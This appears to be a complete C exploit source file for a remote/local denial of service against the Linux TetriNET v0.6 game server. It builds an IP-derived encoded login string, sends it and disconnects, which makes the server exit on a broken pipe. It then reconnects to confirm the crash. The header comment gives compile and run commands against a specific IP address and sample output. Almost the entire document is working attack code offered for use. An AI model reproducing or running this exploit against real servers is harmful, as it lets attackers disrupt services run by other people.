/* (linux)tetrinet[v0.6(current)] "break the pipe" dos, by v9[v9@fakehalo.org].
   the error occurs when a person on the same network as a person running a
   tetrinet server sends a string(encrypted) and disconnects before it is
   completed(login).  this makes the tetrinet server exit with a broken pipe.
  
   note: this was made for linux, mainly as a concept -- if you find anything
         else about it, mail me.  try using netris(it's for real men :P).

   you do this:
    bash# cc tetrinet_dos.c -o tetrinet_dos
    bash# ./tetrinet_dos 209.215.8.28 31457 (127.0.0.1 would work too)
    *** tetrinet(linux)v0.6: remote/local denial of service.
    *** target             : 209.215.8.28:31457.
    *** crash data         : 00469B28AA2D923692C30FB1E168ED63FD2E67A5EF11.
    [ connecting -> connected -> sending crash -> checking -> exploit success. ]
    bash#

   running server does this:
    bash# tetrinet-server
    Broken pipe
    bash#
*/

#define DEFAULT_PORT 31457		// default port. (tetrinet's default)
#define TIMEOUT 5			// time amount before giving up.
#define ENCRYPT "tetrisstart null 1.13"	// incomplete data. (shouldn't change)
#include <stdio.h>
#include <signal.h>
#include <netinet/in.h>
void timeout(){printf("timeout(%d)! ]\n",TIMEOUT);exit(-1);}
int main(int argc,char **argv){
 char target[256],buf[1024],crash[1024],hash[32];
 int sock,port,len,i,a,b,c,d,tmp;
 struct sockaddr_in s;
 if(argc<2){printf("*** syntax: %s <ip> [port]\n",argv[0]);exit(-1);}
 else{strncpy(target,argv[1],256);}
 if(argc>2){port=atoi(argv[2]);}
 else{port=DEFAULT_PORT;}
 strncpy(crash,ENCRYPT,1024);
 if(tmp=strtok(argv[1],".")){a=atoi(tmp);}
 if(tmp=strtok(0,".")){b=atoi(tmp);}
 if(tmp=strtok(0,".")){c=atoi(tmp);}
 if(tmp=strtok(0,".")){d=atoi(tmp);}
 sprintf(hash,"%d",a*54+b*41+c*29+d*17);len=strlen(crash);
 for(i=0;i<len;i++){buf[i+1]=(((buf[i]&0xFF)+(crash[i]&0xFF))%255)^hash[i%strlen(hash)];}
 len++;for(i=0;i<len;i++){sprintf(crash+i*2,"%02X",buf[i]&0xFF);}
 s.sin_addr.s_addr=inet_addr(target);
 s.sin_family=AF_INET;
 s.sin_port=htons(port);
 sock=socket(AF_INET,SOCK_STREAM,0);
 printf("*** tetrinet(linux)v0.6: (remote+local) denial of service.\n");
 printf("*** target             : %s:%d.\n",target,port);
 printf("*** crash data         : %s.\n",crash);
 fprintf(stderr,"[ connecting -> ",target,port);
 signal(SIGALRM, timeout);alarm(TIMEOUT);
 if(connect(sock,(struct sockaddr_in*)&s,sizeof(s))){fprintf(stderr,"connection failed. ]\n");exit(-1);}
 else{fprintf(stderr,"connected -> ");}
 alarm(0);
 fprintf(stderr,"sending crash -> ");
 write(sock,crash,strlen(crash));
 close(sock);
 sleep(1);
 fprintf(stderr,"checking -> ");
 alarm(TIMEOUT);
 sock=socket(AF_INET,SOCK_STREAM,0);
 if(connect(sock,(struct sockaddr_in*)&s,sizeof(s))){fprintf(stderr,"exploit success. ]\n");exit(0);}
 else{fprintf(stderr,"exploit failed. ]\n");}
 close(sock);
 exit(0);
}